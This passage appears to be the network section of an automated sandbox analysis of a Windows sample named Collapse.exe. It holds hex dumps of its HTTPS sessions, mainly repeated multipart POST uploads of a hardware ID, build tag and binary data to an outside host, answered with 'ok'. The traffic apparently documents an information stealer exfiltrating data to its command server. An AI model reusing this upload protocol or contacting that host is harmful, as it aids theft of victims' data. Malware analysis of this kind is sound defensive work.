                                                                                                      2024-12-24 01:17:09 UTC896INData Raw: 50 53 49 59 7a 38 46 4b 50 6c 7a 62 63 4f 77 4a 2f 72 56 6e 77 6c 6b 4a 35 32 34 75 36 34 73 33 56 72 53 32 79 68 71 55 6a 30 38 35 50 6a 48 79 6f 45 64 53 74 4d 63 63 6c 47 48 32 7a 56 62 65 42 42 57 65 55 69 37 36 6b 6d 70 62 6c 62 2f 79 45 76 6d 79 4d 6a 32 2b 4f 63 4b 73 47 30 62 52 31 30 6d 51 4f 4d 72 70 54 38 4e 46 4d 5a 70 57 4e 75 36 4b 48 6e 61 34 71 75 5a 47 74 4a 64 6e 43 54 35 4e 35 70 78 48 63 6f 6a 2f 48 4a 52 31 32 73 46 4b 32 69 51 77 67 31 63 79 78 75 74 58 4e 35 51 4b 35 6b 36 45 67 77 6f 31 31 33 6d 7a 6d 43 35 79 69 4f 59 31 79 56 33 71 34 58 4c 4f 43 41 32 4f 54 68 36 53 69 68 35 4f 6f 4a 4b 36 46 6f 79 4c 65 7a 46 32 55 66 61 34 52 31 61 34 38 79 43 30 54 4d 76 4d 66 74 35 46 4d 4f 4e 75 74 75 36 6d 5a 6e 37 49 68 2f 4a 7a 6f 4e 5a
                                                                                                      Data Ascii: PSIYz8FKPlzbcOwJ/rVnwlkJ524u64s3VrS2yhqUj085PjHyoEdStMcclGH2zVbeBBWeUi76kmpblb/yEvmyMj2+OcKsG0bR10mQOMrpT8NFMZpWNu6KHna4quZGtJdnCT5N5pxHcoj/HJR12sFK2iQwg1cyxutXN5QK5k6Egwo113mzmC5yiOY1yV3q4XLOCA2OTh6Sih5OoJK6FoyLezF2Ufa4R1a48yC0TMvMft5FMONutu6mZn7Ih/JzoNZ
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 34 34 62 33 0d 0a 64 66 42 51 5a 6c 6c 36 41 32 53 76 48 58 4b 4a 6c 63 71 2f 56 43 2f 68 67 52 67 6d 6f 69 37 70 70 53 59 71 53 69 2f 6a 36 6f 6b 32 63 4e 4c 6b 58 75 67 45 64 53 33 4f 38 4d 73 45 58 4b 34 48 2f 37 4a 43 33 6a 62 31 50 61 47 6d 34 4b 78 4b 76 36 32 70 53 4c 61 79 46 6e 65 62 4f 59 4c 6e 4b 49 35 6a 58 4a 58 66 4c 42 55 76 49 34 46 59 5a 69 4d 76 4b 79 61 6e 36 30 70 76 49 36 6e 4a 39 7a 4a 51 70 56 38 70 78 58 55 70 6a 6e 49 4a 78 51 79 38 78 2b 33 6b 55 77 34 32 36 6d 34 6f 59 53 45 35 78 53 2f 6a 61 67 72 77 6f 39 51 30 47 72 6f 46 64 44 6c 62 59 30 67 45 48 57 35 55 72 71 4b 43 47 53 57 67 37 2b 72 6e 49 65 76 4c 62 4b 52 71 79 62 52 77 55 4f 62 66 4b 67 54 33 61 73 2f 78 6d 70 5a 4d 72 70 48 38 4e 46 4d 54 35 61 63 70 4b 69 65 68 4f
                                                                                                      Data Ascii: 44b3dfBQZll6A2SvHXKJlcq/VC/hgRgmoi7ppSYqSi/j6ok2cNLkXugEdS3O8MsEXK4H/7JC3jb1PaGm4KxKv62pSLayFnebOYLnKI5jXJXfLBUvI4FYZiMvKyan60pvI6nJ9zJQpV8pxXUpjnIJxQy8x+3kUw426m4oYSE5xS/jagrwo9Q0GroFdDlbY0gEHW5UrqKCGSWg7+rnIevLbKRqybRwUObfKgT3as/xmpZMrpH8NFMT5acpKiehO
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 76 6d 79 4d 6a 32 43 64 5a 61 4a 53 77 2b 73 73 6a 53 30 62 4d 75 55 66 75 6f 55 49 59 35 65 46 75 71 2b 55 6b 61 49 73 75 49 4f 67 4b 74 48 4f 52 4a 5a 2f 70 78 6a 51 6f 54 6e 45 4c 42 74 78 76 6c 6e 77 78 30 78 6e 67 38 7a 75 34 72 53 59 72 69 32 38 67 4c 63 72 6c 49 45 50 6b 48 57 6f 55 6f 53 7a 4a 64 6f 74 43 44 79 6b 48 37 65 46 54 44 6a 62 68 71 53 6e 6d 35 47 76 4a 4c 69 50 72 43 7a 52 33 55 65 59 64 4b 51 61 32 61 6f 7a 79 43 63 51 65 62 35 4e 6f 6f 6f 49 62 70 66 4d 2b 4f 4b 53 6a 65 56 35 2f 4b 61 78 4c 38 54 4a 54 4e 35 73 35 67 75 63 6f 6a 6d 4e 63 6c 64 79 73 31 4f 37 6a 67 64 72 6e 34 69 32 72 35 36 62 71 79 69 77 69 36 6f 72 78 73 4a 4b 6c 6e 6d 68 46 39 43 6f 4e 74 38 70 46 6a 4c 7a 48 37 65 52 54 44 6a 62 71 34 57 56 74 74 57 36 62 36 58
                                                                                                      Data Ascii: vmyMj2CdZaJSw+ssjS0bMuUfuoUIY5eFuq+UkaIsuIOgKtHORJZ/pxjQoTnELBtxvlnwx0xng8zu4rSYri28gLcrlIEPkHWoUoSzJdotCDykH7eFTDjbhqSnm5GvJLiPrCzR3UeYdKQa2aozyCcQeb5NoooIbpfM+OKSjeV5/KaxL8TJTN5s5gucojmNcldys1O7jgdrn4i2r56bqyiwi6orxsJKlnmhF9CoNt8pFjLzH7eRTDjbq4WVttW6b6X
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 4a 63 50 73 6e 43 6e 47 5a 79 36 65 39 52 71 45 48 37 39 42 2f 43 4f 42 47 69 56 6a 37 43 70 6d 5a 6d 6b 4b 4c 71 47 72 69 76 62 79 45 61 5a 63 36 34 41 32 36 67 38 7a 53 45 65 65 4c 6c 65 75 38 6c 43 49 4a 79 55 39 76 72 56 70 36 49 33 72 49 44 6d 4d 35 72 57 44 35 6c 2f 36 45 71 63 71 43 66 4d 4c 77 56 32 73 6c 53 69 67 67 70 67 6e 70 36 78 72 70 2b 61 70 69 6d 78 67 4b 34 2b 31 4d 4a 50 6a 47 47 75 47 64 4c 6c 65 34 30 74 44 7a 4c 6c 48 34 47 65 42 79 43 45 77 71 2f 69 6b 70 6e 6c 65 66 79 41 72 43 48 61 33 55 75 59 65 4b 73 63 31 4b 41 39 79 53 41 61 66 62 5a 56 75 59 45 4d 62 35 36 45 76 61 53 62 6c 4b 4d 74 73 63 50 6f 62 4e 50 58 44 38 59 7a 6a 77 6a 52 6f 79 4c 63 48 78 42 79 37 42 2b 76 78 78 55 67 6e 49 44 32 2b 74 57 59 71 53 75 78 68 71 49 6b
                                                                                                      Data Ascii: JcPsnCnGZy6e9RqEH79B/COBGiVj7CpmZmkKLqGrivbyEaZc64A26g8zSEeeLleu8lCIJyU9vrVp6I3rIDmM5rWD5l/6EqcqCfMLwV2slSiggpgnp6xrp+apimxgK4+1MJPjGGuGdLle40tDzLlH4GeByCEwq/ikpnlefyArCHa3UuYeKsc1KA9ySAafbZVuYEMb56EvaSblKMtscPobNPXD8YzjwjRoyLcHxBy7B+vxxUgnID2+tWYqSuxhqIk
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 42 71 36 42 58 51 35 57 32 4e 4a 42 70 30 76 46 36 34 67 51 78 6d 6b 59 69 31 71 35 61 53 72 43 65 33 67 4b 77 6a 30 38 6c 4c 6e 6e 69 76 48 4e 71 67 50 73 52 71 57 54 4b 36 52 2f 44 52 54 45 61 34 6e 71 53 51 6d 35 61 2b 59 61 50 4e 76 32 7a 54 77 77 2f 47 4d 36 4d 61 30 37 63 77 78 43 49 54 65 37 31 62 75 6f 51 4c 59 4a 36 42 73 36 61 62 6b 61 49 68 73 49 79 68 4a 4e 76 4c 54 35 45 7a 35 6c 4c 62 76 58 57 56 61 6a 64 35 71 33 36 2b 67 68 34 67 68 4d 4b 76 34 70 4b 5a 35 58 6e 38 6a 61 38 74 33 4d 46 44 6c 6e 65 36 45 74 65 73 4f 73 77 6c 46 33 47 38 56 62 69 62 43 6d 43 51 68 4c 47 71 6b 5a 75 33 49 4c 50 44 36 47 7a 54 31 77 2f 47 4d 35 6b 45 32 36 49 36 6a 77 4d 51 61 62 78 56 73 34 49 41 49 49 54 43 72 2b 4b 53 6d 65 56 35 2f 49 36 71 49 64 44 64 51
                                                                                                      Data Ascii: Bq6BXQ5W2NJBp0vF64gQxmkYi1q5aSrCe3gKwj08lLnnivHNqgPsRqWTK6R/DRTEa4nqSQm5a+YaPNv2zTww/GM6Ma07cwxCITe71buoQLYJ6Bs6abkaIhsIyhJNvLT5Ez5lLbvXWVajd5q36+gh4ghMKv4pKZ5Xn8ja8t3MFDlne6EtesOswlF3G8VbibCmCQhLGqkZu3ILPD6GzT1w/GM5kE26I6jwMQabxVs4IAIITCr+KSmeV5/I6qIdDdQ
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 53 68 4f 55 2b 77 79 38 57 66 72 64 59 76 70 73 4e 61 70 65 4e 73 61 57 65 68 36 34 7a 74 34 75 6c 49 74 7a 47 54 35 42 7a 71 52 2f 63 35 58 75 4e 4c 51 38 79 35 52 2b 56 71 68 74 32 6b 63 36 56 74 59 4f 66 6f 69 32 71 69 4b 63 76 77 73 4a 66 33 6a 33 6f 41 39 75 30 64 5a 55 38 42 32 57 36 51 50 36 51 54 47 65 58 7a 4f 37 69 6e 70 71 72 4c 4c 65 48 72 79 6e 63 7a 45 71 62 65 61 51 65 33 61 30 38 78 79 38 53 64 4c 64 63 76 6f 59 4e 62 4a 2b 46 75 4b 76 56 32 2b 55 6d 70 4d 50 2b 62 4f 4c 66 53 49 5a 2b 75 46 44 75 70 69 54 63 50 78 70 69 75 78 32 66 69 67 42 6a 6e 6f 75 6d 34 6f 72 62 76 47 47 37 6a 2b 5a 30 6c 4d 39 4c 6b 6e 43 76 48 4e 4f 6f 4f 73 6f 68 47 48 69 7a 54 62 2b 4d 42 47 79 54 67 61 53 6f 6e 34 65 73 4b 4c 47 4e 72 6a 37 58 6a 77 48 65 64 4c
                                                                                                      Data Ascii: ShOU+wy8WfrdYvpsNapeNsaWeh64zt4ulItzGT5BzqR/c5XuNLQ8y5R+Vqht2kc6VtYOfoi2qiKcvwsJf3j3oA9u0dZU8B2W6QP6QTGeXzO7inpqrLLeHrynczEqbeaQe3a08xy8SdLdcvoYNbJ+FuKvV2+UmpMP+bOLfSIZ+uFDupiTcPxpiux2figBjnoum4orbvGG7j+Z0lM9LknCvHNOoOsohGHizTb+MBGyTgaSon4esKLGNrj7XjwHedL
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 4e 73 4e 6f 4a 6d 53 77 54 37 4f 4d 43 31 36 6c 67 72 47 32 6b 70 75 6a 49 66 7a 4e 35 69 4f 55 6c 33 62 65 4f 2b 67 74 6b 75 55 74 6a 58 4a 58 52 37 35 52 76 6f 34 61 63 64 61 76 6f 62 53 66 6a 75 63 48 75 35 4b 76 4f 74 6e 64 44 39 41 7a 72 6c 4b 45 39 58 75 4e 4c 67 59 79 35 51 2f 69 30 6c 6b 7a 7a 4e 7a 6b 76 64 75 4d 35 54 66 38 32 2f 52 69 6c 4e 30 50 78 6a 50 76 45 63 36 33 4d 38 34 38 46 44 57 44 59 5a 43 43 47 6d 47 57 68 37 71 63 71 34 43 6d 4c 37 4b 45 73 44 32 55 67 51 2b 52 4d 2f 41 72 6e 4f 31 31 38 6d 52 58 61 76 30 48 38 4c 77 50 62 70 57 4c 6f 4c 50 59 74 61 34 33 76 59 36 74 49 4a 62 4f 51 6f 35 30 36 46 79 63 6f 33 57 56 65 6c 6b 79 75 55 37 77 30 56 77 79 77 4e 6e 6c 39 63 58 48 75 6d 2b 6c 77 37 42 73 6a 4a 30 42 33 6d 48 6f 53 70 7a
                                                                                                      Data Ascii: NsNoJmSwT7OMC16lgrG2kpujIfzN5iOUl3beO+gtkuUtjXJXR75Rvo4acdavobSfjucHu5KvOtndD9AzrlKE9XuNLgYy5Q/i0lkzzNzkvduM5Tf82/RilN0PxjPvEc63M848FDWDYZCCGmGWh7qcq4CmL7KEsD2UgQ+RM/ArnO118mRXav0H8LwPbpWLoLPYta43vY6tIJbOQo506Fyco3WVelkyuU7w0VwywNnl9cXHum+lw7BsjJ0B3mHoSpz
                                                                                                      2024-12-24 01:17:09 UTC1369INData Raw: 79 4a 78 72 46 79 77 67 6b 77 75 32 34 72 32 2b 73 66 62 35 53 57 74 77 2f 35 38 68 70 51 61 7a 53 54 34 51 4d 50 72 4c 49 30 38 56 79 72 76 45 66 43 62 54 44 6a 62 79 37 57 77 68 35 4f 6d 4e 37 2f 45 6d 42 4c 79 7a 45 69 59 63 4b 59 46 7a 65 63 61 7a 69 45 62 66 72 70 4a 6a 72 63 5a 59 35 57 43 73 62 53 45 31 65 74 68 73 38 50 2b 46 5a 54 65 52 5a 6b 2f 34 46 37 4e 74 6a 76 47 50 42 41 79 67 68 48 77 6b 55 77 34 32 37 6d 31 72 4a 75 53 73 7a 44 78 70 61 55 72 30 73 78 42 69 57 4c 6f 58 4a 79 6a 64 5a 56 34 57 54 4b 35 54 76 44 52 58 44 4c 41 32 65 58 31 78 63 65 36 62 36 58 44 73 47 79 4d 6e 41 48 65 59 65 68 4b 6e 4f 49 37 77 43 73 55 66 4c 35 4e 6f 6f 38 50 64 70 6a 4c 69 4a 79 77 6d 4b 67 6b 73 6f 53 59 45 76 58 46 58 35 4e 38 72 79 7a 69 6b 69 54 4b
                                                                                                      Data Ascii: yJxrFywgkwu24r2+sfb5SWtw/58hpQazST4QMPrLI08VyrvEfCbTDjby7Wwh5OmN7/EmBLyzEiYcKYFzecaziEbfrpJjrcZY5WCsbSE1eths8P+FZTeRZk/4F7NtjvGPBAyghHwkUw427m1rJuSszDxpaUr0sxBiWLoXJyjdZV4WTK5TvDRXDLA2eX1xce6b6XDsGyMnAHeYehKnOI7wCsUfL5Noo8PdpjLiJywmKgksoSYEvXFX5N8ryzikiTK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749701172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:11 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=SXXY4QL4J5NLF0G
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 12828
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:11 UTC12828OUTData Raw: 2d 2d 53 58 58 59 34 51 4c 34 4a 35 4e 4c 46 30 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 41 46 35 41 37 45 36 42 43 42 41 36 34 38 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 53 58 58 59 34 51 4c 34 4a 35 4e 4c 46 30 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 58 58 59 34 51 4c 34 4a 35 4e 4c 46 30 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d 53 58 58
                                                                                                      Data Ascii: --SXXY4QL4J5NLF0GContent-Disposition: form-data; name="hwid"FEAF5A7E6BCBA648961F82810656F945--SXXY4QL4J5NLF0GContent-Disposition: form-data; name="pid"2--SXXY4QL4J5NLF0GContent-Disposition: form-data; name="lid"BVnUqo--@distez--SXX
                                                                                                      2024-12-24 01:17:12 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:12 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=bklimensjftvi9dthesvk9uh09; expires=Fri, 18 Apr 2025 19:03:51 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BN5bsNIUGJweLEyjbDDB0vO4oUEdOc8lOoYP%2F9aZ9iuSs2ZIEoehfTDC3ycYZjHucIB9iEXlB%2FhdzvHbqA7haB7EigihzBq5IZfNr3uPsKKno45w9%2FN6q89BksAiyrCxSI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc0143ca15e70-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1655&min_rtt=1633&rtt_var=656&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13764&delivery_rate=1613259&cwnd=228&unsent_bytes=0&cid=a5ebafc1aa704323&ts=1217&x=0"
                                                                                                      2024-12-24 01:17:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-24 01:17:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.749703172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:14 UTC279OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=8JXQ8I4DTVH3RZSS
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 15066
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:14 UTC15066OUTData Raw: 2d 2d 38 4a 58 51 38 49 34 44 54 56 48 33 52 5a 53 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 41 46 35 41 37 45 36 42 43 42 41 36 34 38 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 38 4a 58 51 38 49 34 44 54 56 48 33 52 5a 53 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4a 58 51 38 49 34 44 54 56 48 33 52 5a 53 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d
                                                                                                      Data Ascii: --8JXQ8I4DTVH3RZSSContent-Disposition: form-data; name="hwid"FEAF5A7E6BCBA648961F82810656F945--8JXQ8I4DTVH3RZSSContent-Disposition: form-data; name="pid"2--8JXQ8I4DTVH3RZSSContent-Disposition: form-data; name="lid"BVnUqo--@distez--
                                                                                                      2024-12-24 01:17:14 UTC1136INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:14 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=i73eijsccjqbvscd1b179el6ae; expires=Fri, 18 Apr 2025 19:03:53 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFc2z2wG9Mmi6t2yvd0dKrHL9tk7wji0wNG8mAPiZIuuGE%2FJLoELSXYMBdHYbhJ0cIBFvXZg1DSS%2BxwI2H%2FGWNI6rLkDlNaz45kX8%2B48UePCRJ8fTqawx%2F%2BF8IrvrqVRQsw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc023fa1a2395-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=30226&min_rtt=1872&rtt_var=17615&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=16003&delivery_rate=1559829&cwnd=139&unsent_bytes=0&cid=9f149058e7e77300&ts=835&x=0"
                                                                                                      2024-12-24 01:17:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-24 01:17:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.749709172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:16 UTC277OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=B8QW7W633XHP9M
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20379
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:16 UTC15331OUTData Raw: 2d 2d 42 38 51 57 37 57 36 33 33 58 48 50 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 41 46 35 41 37 45 36 42 43 42 41 36 34 38 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 42 38 51 57 37 57 36 33 33 58 48 50 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 38 51 57 37 57 36 33 33 58 48 50 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d 42 38 51 57 37 57
                                                                                                      Data Ascii: --B8QW7W633XHP9MContent-Disposition: form-data; name="hwid"FEAF5A7E6BCBA648961F82810656F945--B8QW7W633XHP9MContent-Disposition: form-data; name="pid"3--B8QW7W633XHP9MContent-Disposition: form-data; name="lid"BVnUqo--@distez--B8QW7W
                                                                                                      2024-12-24 01:17:16 UTC5048OUTData Raw: d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00
                                                                                                      Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                      2024-12-24 01:17:17 UTC1137INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 24 Dec 2024 01:17:17 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=rvf3m1p61tuufdq3u74sml183l; expires=Fri, 18 Apr 2025 19:03:55 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2FqK3HKYJ7jljN%2BoirJrkkdLaRI5z4lN%2Bp9UBvh9POal9z7hzOVF%2FtYfGEjoyK568%2FBSBae3Mo%2BeVfTTv%2BD0i1u%2Buv6R4TKx887VqmbMHKPBRQ7c9vY3dB6x7QBYgCRzTNg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6cc0325c0743e3-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1707&rtt_var=655&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21336&delivery_rate=1710603&cwnd=229&unsent_bytes=0&cid=8b8e933bfccff8d2&ts=947&x=0"
                                                                                                      2024-12-24 01:17:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-24 01:17:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.749715172.67.199.724435924C:\Users\user\Desktop\Collapse.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-24 01:17:19 UTC270OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=TOXTP5F9
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1162
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-24 01:17:19 UTC1162OUTData Raw: 2d 2d 54 4f 58 54 50 35 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 41 46 35 41 37 45 36 42 43 42 41 36 34 38 39 36 31 46 38 32 38 31 30 36 35 36 46 39 34 35 0d 0a 2d 2d 54 4f 58 54 50 35 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 4f 58 54 50 35 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d 54 4f 58 54 50 35 46 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
